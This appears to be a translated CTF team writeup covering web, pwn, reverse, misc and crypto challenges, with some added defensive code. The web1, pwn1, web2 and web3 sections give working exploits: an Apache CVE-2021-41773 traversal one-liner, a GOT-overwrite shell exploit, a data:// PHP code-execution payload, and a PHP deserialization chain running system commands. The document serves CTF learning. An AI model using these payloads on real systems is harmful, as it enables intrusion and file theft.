HashRun Security Team writeup

admin, 2023-02-03 10:32:55

web1

Topic: CVE-2021-41773

Tools involved: curl.exe

A one-liner.

Reference article: https://blog.csdn.net/weixin_45260839/article/details/125113167

Bash
curl.exe -v --path-as-is http://<your-challenge-host>/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag



pwn1

Looking through the code, we find that five memory chunks are initialised.

Of these, 400aa0 is:

Then it asks for a name,

and prints it below with puts.

So the rough idea is to overwrite puts@got with the address of system.

Then it asks for a code segment and a stack.

Then it jumps to 0x401040 to execute the code segment.

It turns out to be a VM; while searching, we stumbled on the original challenge, ciscn_2019_qual_virtual, and following its approach solves it.

exp:

Python
from pwn import *

context.terminal = ['konsole', '-e']

# p = process("./your_cpt")
p = remote("ip", "port")                 # challenge host and port
elf = ELF("./your_cpt")
puts_got = elf.got['puts']               # GOT slot to redirect to system

# The name is what puts() later receives; once puts@got points to system,
# that call becomes system("/bin/sh")
p.recvuntil(b"name?\n")
p.sendline(b"/bin/sh")

# VM program: read puts@got, add the puts -> system offset of the target libc,
# and write the result back over the GOT slot (layout follows ciscn_2019_qual_virtual)
p.recvuntil(b"Code:\n")
p.sendline(b"push push load push sub div load push add push push load push sub div save")

# VM stack operands: the GOT address and the offset (-0x2a300 for this libc)
p.recvuntil(b"Stack:\n")
stack = "8 -4 " + str(puts_got + 8) + " " + str(-0x2a300) + " 8 -5 " + str(puts_got + 8)
p.sendline(stack.encode())

p.interactive()
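As an added illustration (not code from the writeup or from the challenge), here is a toy stack VM in Python whose load/save validate the address against the VM's own memory before touching it. The opcode names follow the exp above, but the semantics are assumed and simplified, not those of the challenge binary or of ciscn_2019_qual_virtual. The unchecked mode shows the bug class the exp relies on: an address derived from user-supplied operands is used as-is, and Python's negative indexing stands in for reading outside the intended array.

```python
class VMError(Exception):
    """Raised when a program would step outside the VM's own state."""


class StackVM:
    """Hypothetical stack machine (assumed semantics, not the challenge's).

    `push` consumes the next integer from the user-supplied operand list,
    `load` pops an address and pushes memory[address], `save` pops an address
    and then a value and stores it, and add/sub/mul/div pop two operands.
    With checked=False the load/save index is used unvalidated.
    """

    MEMORY_SIZE = 16
    MAX_STACK = 64

    def __init__(self, program, operands, checked=True):
        self.ops = program.split()
        self.operands = list(operands)
        self.stack = []
        self.memory = [0] * self.MEMORY_SIZE
        self.checked = checked

    def _pop(self):
        if not self.stack:
            raise VMError("stack underflow")
        return self.stack.pop()

    def _push(self, value):
        if len(self.stack) >= self.MAX_STACK:
            raise VMError("stack overflow")
        self.stack.append(value)

    def _index(self, addr):
        # The fix: every memory access is validated against the VM's own array.
        if self.checked and not 0 <= addr < self.MEMORY_SIZE:
            raise VMError("memory access out of range: %d" % addr)
        return addr

    def run(self):
        for op in self.ops:
            if op == "push":
                if not self.operands:
                    raise VMError("push with no operand left")
                self._push(self.operands.pop(0))
            elif op == "pop":
                self._pop()
            elif op in ("add", "sub", "mul", "div"):
                b, a = self._pop(), self._pop()
                if op == "add":
                    r = a + b
                elif op == "sub":
                    r = a - b
                elif op == "mul":
                    r = a * b
                else:
                    if b == 0:
                        raise VMError("division by zero")
                    r = a // b
                self._push(r)
            elif op == "load":
                self._push(self.memory[self._index(self._pop())])
            elif op == "save":
                addr = self._index(self._pop())
                self.memory[addr] = self._pop()
            else:
                raise VMError("unknown opcode %r" % op)
        return list(self.stack)


def run_program(program, operands, checked=True):
    """Run a program; return (final stack, memory) for inspection."""
    vm = StackVM(program, operands, checked=checked)
    stack = vm.run()
    return stack, vm.memory


def is_rejected(program, operands, checked=True):
    """True when the VM refuses the program, which is what a checked VM should do
    for any address outside its own memory."""
    try:
        run_program(program, operands, checked=checked)
    except VMError:
        return True
    return False


if __name__ == "__main__":
    print(run_program("push push add push save push load", [2, 3, 4, 4]))
    print(is_rejected("push load", [-1]), is_rejected("push load", [-1], checked=False))
```

The benign program computes 2 + 3, stores it at address 4 and reads it back; the same `push load` with a negative operand is refused in checked mode and silently reads the last memory cell in unchecked mode.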


re1

Open it in IDA; it's easy to see it's written in Go...

But... it just won't run, no matter what...

So, static analysis; can't make much of it...

From the function names, though, we can tell it listens on a port and sends/receives data...

But this protocol... never seen it before; only know it's TCP-based...

A web search shows it's the Modbus protocol...

Found the library, so it shouldn't be hard... but no dynamic debugging...

Opening the suspected encryption function, we find the string "expand 32-byte k"...

Looks familiar... a quick lookup shows it's the ChaCha20 algorithm...

Decrypting, we luckily get a scrambled flag.

Then guessing the scramble: swapping every two characters makes the flag "look normal"...

Submitted it... and it actually passed...

Function list (screenshots):

exp:

Python
#! /usr/bin/python3
# by [email protected] at Thu May 24 18:44:15 CEST 2018
"""Pure Python 3 implementation of the ChaCha20 stream cipher.

It works with Python 3.5 (and probably also earlier Python 3.x).

Based on https://gist.github.com/cathalgarvey/0ce7dbae2aa9e3984adc
Based on Numpy implementation: https://gist.github.com/chiiph/6855750
Based on http://cr.yp.to/chacha.html
More info about ChaCha20: https://en.wikipedia.org/wiki/Salsa20
"""
import struct


def yield_chacha20_xor_stream(key, iv, position=0):
    """Generate the xor stream with the ChaCha20 cipher."""
    if not isinstance(position, int):
        raise TypeError
    if position & ~0xffffffff:
        raise ValueError('Position is not uint32.')
    if not isinstance(key, bytes):
        raise TypeError
    if not isinstance(iv, bytes):
        raise TypeError
    if len(key) != 32:
        raise ValueError
    if len(iv) != 8:
        raise ValueError

    def rotate(v, c):
        return ((v << c) & 0xffffffff) | v >> (32 - c)

    def quarter_round(x, a, b, c, d):
        x[a] = (x[a] + x[b]) & 0xffffffff
        x[d] = rotate(x[d] ^ x[a], 16)
        x[c] = (x[c] + x[d]) & 0xffffffff
        x[b] = rotate(x[b] ^ x[c], 12)
        x[a] = (x[a] + x[b]) & 0xffffffff
        x[d] = rotate(x[d] ^ x[a], 8)
        x[c] = (x[c] + x[d]) & 0xffffffff
        x[b] = rotate(x[b] ^ x[c], 7)

    ctx = [0] * 16
    # "expand 32-byte k" as four little-endian words: the constant spotted in IDA
    ctx[:4] = (1634760805, 857760878, 2036477234, 1797285236)
    ctx[4:12] = struct.unpack('<8L', key)
    ctx[12] = ctx[13] = position
    ctx[14:16] = struct.unpack('<LL', iv)
    while 1:
        x = list(ctx)
        for i in range(10):
            quarter_round(x, 0, 4, 8, 12)
            quarter_round(x, 1, 5, 9, 13)
            quarter_round(x, 2, 6, 10, 14)
            quarter_round(x, 3, 7, 11, 15)
            quarter_round(x, 0, 5, 10, 15)
            quarter_round(x, 1, 6, 11, 12)
            quarter_round(x, 2, 7, 8, 13)
            quarter_round(x, 3, 4, 9, 14)
        for c in struct.pack('<16L', *(
                (x[i] + ctx[i]) & 0xffffffff for i in range(16))):
            yield c
        ctx[12] = (ctx[12] + 1) & 0xffffffff
        if ctx[12] == 0:
            ctx[13] = (ctx[13] + 1) & 0xffffffff


def chacha20_encrypt(data, key, iv=None, position=0):
    """Encrypt (or decrypt) with the ChaCha20 cipher."""
    if not isinstance(data, bytes):
        raise TypeError
    # IV hard-coded to the nonce used by the challenge binary
    iv = b'\x03\x01\x02\x04\x03\x05\x01\x02'
    if isinstance(key, bytes):
        if not key:
            raise ValueError('Key is empty.')
        if len(key) < 32:
            # TODO(pts): Do key derivation with PBKDF2 or something similar.
            key = (key * (32 // len(key) + 1))[:32]
        if len(key) > 32:
            raise ValueError('Key too long.')

    return bytes(a ^ b for a, b in
                 zip(data, yield_chacha20_xor_stream(key, iv, position)))


# Data and key extracted from the binary (`plaintext` holds the encrypted bytes)
plaintext = bytes([0x9F, 0x29, 0x32, 0x8A, 0xC3, 0x70, 0xBC, 0xEA, 0x20, 0x40, 0xF1,
                   0x17, 0x69, 0xE8, 0xFD, 0x40, 0x03, 0xE6, 0xA3, 0x97, 0xB7, 0x1E,
                   0xD3, 0xBF, 0x24, 0x83, 0x32, 0xAB, 0x79, 0x28, 0x25, 0x37])
key = bytes([0x0C, 0x17, 0x22, 0x17, 0x2B, 0x36, 0x4C, 0x2D, 0x21, 0x36, 0x41,
             0x17, 0x2D, 0x17, 0x41, 0x20, 0x0C, 0x36, 0x17, 0x41, 0x56, 0x19,
             0x2D, 0x4B, 0x4A, 0x17, 0x40, 0x55, 0x18, 0x2E, 0x4C, 0x22])
flag = bytearray(chacha20_encrypt(plaintext, key))
# The decrypted flag is scrambled: swap every pair of characters back
for i in range(0, 32, 2):
    l = flag[i]
    flag[i] = flag[i + 1]
    flag[i + 1] = l
print(flag)

flag{1849fe0d625382a75c93041a1c}



web2

F12; base64-decode twice.

Visit the decoded address.

Use the data:// wrapper to push it through.

Because there is filtering, base64-encode what follows the wrapper,

for example with base64,

and it can be popped.

PS: probably a nesting thing, so the shorthand file=data&content=base64

also works, and is unintended.

exp:

Plain Text
/cream.php?file=data://,&content=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs/Pg==
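Added here as a defender-side complement to the web1 and web2 payloads (not part of the original writeup): a small Python scanner over constructed access-log lines. It percent-decodes each request target repeatedly, so the double-encoded `.%%32%65` becomes `..` just as Apache's second decoding pass did, then flags `..` path segments and stream-wrapper values such as `data:` in query parameters. The sample lines are constructed, and the `WRAPPERS` list and finding labels are my own choices.

```python
from urllib.parse import unquote, urlsplit

# Constructed sample request lines (not from the page); the first two mirror
# the shapes of the web1 and web2 requests in the writeup.
SAMPLE_LOG = [
    "GET /icons/.%%32%65/.%%32%65/.%%32%65/flag HTTP/1.1",
    "GET /cream.php?file=data://,&content=data://text/plain;base64,PD9w HTTP/1.1",
    "GET /index.php?file=about.php HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
]

# Stream wrappers that should never appear in a file-name parameter
WRAPPERS = ("data:", "php://", "phar://", "expect:", "file://", "glob://")


def fully_decode(text, limit=5):
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded payloads such as .%%32%65 end up as '..'."""
    for _ in range(limit):
        decoded = unquote(text)
        if decoded == text:
            return text
        text = decoded
    return text


def has_traversal(path):
    """True if any path segment, after decoding, is '..'."""
    return any(segment == ".." for segment in path.split("/"))


def analyze(request_line):
    """Return a list of finding labels for one access-log request line."""
    parts = request_line.split()
    target = parts[1] if len(parts) > 1 else parts[0]
    url = urlsplit(fully_decode(target))
    findings = []
    if has_traversal(url.path):
        findings.append("encoded-path-traversal")
    # Split the query on '&' only; ';' is legitimate inside data: URLs
    for pair in url.query.split("&"):
        name, _, value = pair.partition("=")
        if value.lower().startswith(WRAPPERS):
            findings.append("stream-wrapper:" + name)
    return findings


def scan(lines):
    """Return [(line, findings)] for every line with at least one finding."""
    flagged = []
    for line in lines:
        findings = analyze(line)
        if findings:
            flagged.append((line, findings))
    return flagged


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOG):
        print(findings, line)
```

Decoding to a fixed point is what catches the `.%%32%65` variant; a single `unquote` pass leaves `.%2e` behind and the traversal check misses it.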


misc3


Misc1

Download the attachment.

Base64-decode it.

Save it as a PNG and look at the hex.

Every two bytes are swapped. Script:

Python

# Read the scrambled PNG, swap every pair of bytes back, and write the result
with open("./MISC1.png", "rb") as f:
    data1 = f.read()

with open("./OUTPUT.png", "wb") as f2:
    for i1 in range(0, len(data1), 2):
        for i2 in [1, 0]:            # emit the second byte of the pair first, then the first
            try:
                f2.write(bytes([data1[i1 + i2]]))
            except IndexError:       # odd-length input: the lone trailing byte is written as-is
                pass
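An added example (not the team's script) that generalises the step above: instead of assuming a pair swap, try a few candidate transforms and keep the first whose output starts with a known file signature. The PNG sample is constructed, and the transform list and magic table are my own assumptions.

```python
import sys

# File signatures (magic bytes) that a correctly descrambled file should start with
MAGICS = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "zip": b"PK\x03\x04",
    "pdf": b"%PDF",
}


def swap_byte_pairs(data):
    """Undo a pairwise byte swap (ab cd ef -> ba dc fe); an odd trailing byte stays put."""
    out = bytearray(data)
    for i in range(0, len(out) - 1, 2):
        out[i], out[i + 1] = out[i + 1], out[i]
    return bytes(out)


def swap_nibbles(data):
    """Swap the two hex digits of every byte (0x89 -> 0x98)."""
    return bytes(((b & 0x0F) << 4) | (b >> 4) for b in data)


# Candidate descrambling transforms, tried in order
TRANSFORMS = {
    "identity": lambda d: bytes(d),
    "swap-byte-pairs": swap_byte_pairs,
    "reverse": lambda d: bytes(d[::-1]),
    "swap-nibbles": swap_nibbles,
}


def identify(data):
    """Return the file type whose magic matches the start of data, or None."""
    for kind, magic in MAGICS.items():
        if data.startswith(magic):
            return kind
    return None


def descramble(data):
    """Try each transform; return (transform, file type, bytes) for the first
    one that yields a known file signature, or None if none does."""
    for name, transform in TRANSFORMS.items():
        candidate = transform(data)
        kind = identify(candidate)
        if kind:
            return name, kind, candidate
    return None


# Constructed sample: a PNG signature plus the start of an IHDR chunk,
# scrambled the way the challenge file was (every pair of bytes swapped)
SAMPLE_PNG_PREFIX = MAGICS["png"] + b"\x00\x00\x00\x0dIHDR" + bytes(13)
SCRAMBLED_SAMPLE = swap_byte_pairs(SAMPLE_PNG_PREFIX)


if __name__ == "__main__":
    # usage: python descramble.py scrambled.bin recovered.bin (falls back to the sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 2 else SCRAMBLED_SAMPLE
    result = descramble(blob)
    if result is None:
        print("no known signature after any transform")
    else:
        name, kind, recovered = result
        print("transform=%s type=%s" % (name, kind))
        if len(sys.argv) > 2:
            open(sys.argv[2], "wb").write(recovered)
```

Checking the magic after the transform is the sanity check the script above lacks: if the output does not start with the PNG signature, the guess about the scramble was wrong and the file is not worth opening in a stego tool yet.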

(Don't just paste the writeup straight in.

Then we get the original image back.

LSB with a key: the universal one, and xian.

web3

Open the challenge link.

A directory scan finds a backup file, www.zip.

Downloading it gives two files, demo.php and index.php; the second one is empty.

demo.php contains a deserialization vulnerability.

Bypass point: the parameter value may not contain an O, so we wrap the object in an array to get around it.

Note __wakeup here: it has the classic loose != string comparison, which lets us jump straight into the __toString method. The exp is below:

One more pitfall: the challenge runs PHP 5.5, so remember to turn the boxes into %00 (they come from the protected property); run the exp with PHP 5.5.

Sliver::__wakeup => Range::__toString => Water::__get => Circle::__invoke => ::runc

Exp:

PHP

<?php
class Water{
    public $waterfall;
}

class Circle{
    public $daemon;
    public $dash;
    public function __construct(){
        $this->dash = "system('nl+/*');";
    }
}

class Range{
    public $horis;
    public $link;
}

class Sliver{
    public $secret;
    public $resty;
}

$w = new Water();
$c = new Circle();
$r = new Range();
$s = new Sliver();

$w->waterfall = $c;
$r->link = $w;
$s->secret = $r;            // chain: Sliver -> Range -> Water -> Circle
$a = array("1", $s);        // wrap in an array so the payload does not start with "O"
$final = serialize($a);
echo urlencode($final);

POP payload:

Plain Text
a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3BO%3A6%3A%22Sliver%22%3A2%3A%7Bs%3A6%3A%22secret%22%3BO%3A5%3A%22Range%22%3A2%3A%7Bs%3A5%3A%22horis%22%3Bs%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3Bs%3A4%3A%22link%22%3BO%3A5%3A%22Water%22%3A1%3A%7Bs%3A9%3A%22waterfall%22%3BO%3A6%3A%22Circle%22%3A2%3A%7Bs%3A6%3A%22daemon%22%3BN%3Bs%3A7%3A%22%00%2A%00dash%22%3Bs%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3B%7D%7D%7Ds%3A5%3A%22resty%22%3BN%3B%7D
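Added example, not code from the writeup: a strict parser for PHP's serialize() format in Python that walks nested arrays and lists every embedded object with its demangled property names. Run on the POP payload above, it shows why a filter that rejects values containing `O` at the start is bypassed by an array wrapper: the value does not begin with `O:`, yet four objects are inside. The page's copy of the payload is one `}` short of closing the outer array, so the sample appends it, and the truncated form is used to show the parser rejecting it.

```python
from urllib.parse import unquote_to_bytes

# The URL-encoded POP payload from the writeup, with the outer array's missing
# closing brace appended (the copy on the page ends one '}' short).
PAGE_PAYLOAD = unquote_to_bytes(
    b"a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3BO%3A6%3A%22Sliver%22%3A2%3A%7B"
    b"s%3A6%3A%22secret%22%3BO%3A5%3A%22Range%22%3A2%3A%7Bs%3A5%3A%22horis%22%3B"
    b"s%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3Bs%3A4%3A%22link%22%3B"
    b"O%3A5%3A%22Water%22%3A1%3A%7Bs%3A9%3A%22waterfall%22%3BO%3A6%3A%22Circle%22%3A2%3A%7B"
    b"s%3A6%3A%22daemon%22%3BN%3Bs%3A7%3A%22%00%2A%00dash%22%3B"
    b"s%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3B%7D%7D%7Ds%3A5%3A%22resty%22%3BN%3B%7D"
) + b"}"


class PHPObject:
    """A deserialized object: class name and an ordered dict of properties."""
    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def demangle(name):
    """Split a serialized property name into (visibility, bare name):
    "\\0*\\0x" is protected, "\\0Class\\0x" is private, anything else public."""
    if name.startswith(b"\x00*\x00"):
        return "protected", name[3:]
    if name.startswith(b"\x00"):
        _, _owner, prop = name.split(b"\x00", 2)
        return "private", prop
    return "public", name


def _int_until(buf, pos, stop):
    end = buf.index(stop, pos)
    return int(buf[pos:end]), end


def parse(buf, pos=0):
    """Parse one value at buf[pos]; return (value, position after it)."""
    t = buf[pos:pos + 1]
    if t == b"N":                                   # N;
        return None, pos + 2
    if t in (b"i", b"b", b"d"):                     # i:123;  b:1;  d:1.5;
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end]
        return (float(raw) if t == b"d" else int(raw)), end + 1
    if t == b"s":                                   # s:len:"bytes";
        n, end = _int_until(buf, pos + 2, b":")
        start = end + 2
        if buf[start + n:start + n + 2] != b'";':
            raise ValueError("bad string at %d" % pos)
        return buf[start:start + n], start + n + 2
    if t == b"a":                                   # a:count:{key;value...}
        n, end = _int_until(buf, pos + 2, b":")
        pos = end + 2
        items = {}
        for _ in range(n):
            k, pos = parse(buf, pos)
            v, pos = parse(buf, pos)
            items[k] = v
        if buf[pos:pos + 1] != b"}":
            raise ValueError("array not closed at %d" % pos)
        return items, pos + 1
    if t == b"O":                                   # O:len:"Class":count:{...}
        n, end = _int_until(buf, pos + 2, b":")
        name = buf[end + 2:end + 2 + n]
        count, end2 = _int_until(buf, end + 2 + n + 2, b":")
        pos = end2 + 2
        props = {}
        for _ in range(count):
            k, pos = parse(buf, pos)
            v, pos = parse(buf, pos)
            props[k] = v
        if buf[pos:pos + 1] != b"}":
            raise ValueError("object not closed at %d" % pos)
        return PHPObject(name, props), pos + 1
    raise ValueError("unsupported type %r at %d" % (t, pos))


def find_objects(value, found=None):
    """Depth-first list of every PHPObject embedded in value."""
    if found is None:
        found = []
    if isinstance(value, PHPObject):
        found.append(value)
        for v in value.props.values():
            find_objects(v, found)
    elif isinstance(value, dict):
        for v in value.values():
            find_objects(v, found)
    return found


def embedded_classes(payload):
    """Class names of all objects in a serialized value, however deeply nested."""
    value, end = parse(payload)
    if end != len(payload):
        raise ValueError("trailing data after value")
    return [obj.cls.decode() for obj in find_objects(value)]
```

The defensive lesson is the inverse of the exp: a check on the first bytes of the input says nothing about what unserialize() will instantiate, so either parse the whole structure (as here) or, in PHP 7+, pass an `allowed_classes` list to unserialize().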

cry1

Guessing it's Morse code: in the text, replace A with "-", B with ".", and newlines with spaces.

Decode the result with an online Morse decoder to get the string:

Plain Text
mdbrhxsgvkxwxcfsggdfspscxvgptfgpds.bkjogdtkfoejfwvdowfjvfhfadkkdwxpsmptpgfwkptegvhfsftxhxsgfsmbdojkptegpsikpstxhxsgmpvorgxvpskxtfkmgdmptpgfwhxmpf.gexiwftpv1m817i23-4x20-9405-qi6m-x83m055316m6,owxfvxfmmiwftvgkpstfsmqkfbxvjdrkvxwi,fsmfwwwxggxkvfkxwdnxkbfvx.

Then run that through quipqiup to get:

Plain Text
documents relevant to an investigation cryptography also plays a major role in digital rights management and copyright infringement disputes in regard to digital media the flag is d feb f de d d please add flag string and braces yourself and all letters are lower case

After translating it, we roughly work out that the letters have to be substituted back into the earlier string.

Substituting the decrypted letters for the original ones gives:

Plain Text
1d817f23-4e20-9405-bf6d-e83d055316d6

The final flag is flag{1d817f23-4e20-9405-bf6d-e83d055316d6}
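The whole solve as an added example (not the team's code): A/B Morse decoding on a constructed sample, recovery of the substitution key by aligning the Morse-decoded ciphertext with the quipqiup plaintext (both copied from above), and application of that key to the hyphenated flag token. The Morse table and the regular expression that picks out the token are my additions.

```python
import re

# ITU Morse table (letters, digits, and the punctuation present in the text)
MORSE = {
    "a": ".-", "b": "-...", "c": "-.-.", "d": "-..", "e": ".", "f": "..-.",
    "g": "--.", "h": "....", "i": "..", "j": ".---", "k": "-.-", "l": ".-..",
    "m": "--", "n": "-.", "o": "---", "p": ".--.", "q": "--.-", "r": ".-.",
    "s": "...", "t": "-", "u": "..-", "v": "...-", "w": ".--", "x": "-..-",
    "y": "-.--", "z": "--..", "0": "-----", "1": ".----", "2": "..---",
    "3": "...--", "4": "....-", "5": ".....", "6": "-....", "7": "--...",
    "8": "---..", "9": "----.", ".": ".-.-.-", ",": "--..--", "-": "-....-",
}
FROM_MORSE = {code: sym for sym, code in MORSE.items()}


def decode_ab_morse(text):
    """Step 1 of the writeup: A -> '-', B -> '.', newline -> space, then decode
    each whitespace-separated token; unknown tokens become '?'."""
    morse = text.replace("A", "-").replace("B", ".").replace("\n", " ")
    return "".join(FROM_MORSE.get(token, "?") for token in morse.split())


# Morse-decoded ciphertext and the quipqiup plaintext, both from the writeup
CIPHER = ("mdbrhxsgvkxwxcfsggdfspscxvgptfgpds.bkjogdtkfoejfwvdowfjvfhfadkkdwxpsmptpgfw"
          "kptegvhfsftxhxsgfsmbdojkptegpsikpstxhxsgmpvorgxvpskxtfkmgdmptpgfwhxmpf."
          "gexiwftpv1m817i23-4x20-9405-qi6m-x83m055316m6,owxfvxfmmiwftvgkpstfsmqkf"
          "bxvjdrkvxwi,fsmfwwwxggxkvfkxwdnxkbfvx.")
PLAIN = ("documents relevant to an investigation cryptography also plays a major role "
         "in digital rights management and copyright infringement disputes in regard "
         "to digital media the flag is d feb f de d d please add flag string and "
         "braces yourself and all letters are lower case")

# The flag token is the only digit-led run with four hyphens in the ciphertext
FLAG_TOKEN_RE = re.compile(r"\d[0-9a-z]*(?:-[0-9a-z]+){4}")


def recover_key(cipher, plain):
    """Align the letters of a known ciphertext/plaintext pair into a
    substitution table, rejecting any cipher letter that would map two ways."""
    c_letters = [ch for ch in cipher if ch.isalpha()]
    p_letters = [ch for ch in plain if ch.isalpha()]
    if len(c_letters) != len(p_letters):
        raise ValueError("letter counts differ: %d vs %d" % (len(c_letters), len(p_letters)))
    key = {}
    for c, p in zip(c_letters, p_letters):
        if key.setdefault(c, p) != p:
            raise ValueError("cipher letter %r maps to both %r and %r" % (c, key[c], p))
    return key


def apply_key(key, text):
    """Substitute letters through key; digits and punctuation pass through."""
    return "".join(key.get(ch, ch) for ch in text)


def solve():
    """Recover the key from the page's pair and translate the flag token."""
    key = recover_key(CIPHER, PLAIN)
    token = FLAG_TOKEN_RE.search(CIPHER).group(0)
    return "flag{" + apply_key(key, token) + "}"


if __name__ == "__main__":
    print(decode_ab_morse("AA ABB ABBB"))   # constructed sample: "mdb"
    print(solve())
```

Deriving the key from the alignment rather than eyeballing four letters also checks the quipqiup result for consistency: a contradiction anywhere in the 200-odd letters raises instead of silently producing a wrong flag.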


Originally published on the WeChat public account HashRun安全团队 (HashRun Security Team): HashRun Security Team writeup

Reposted at CN-SEC: https://cn-sec.com/archives/1291271.html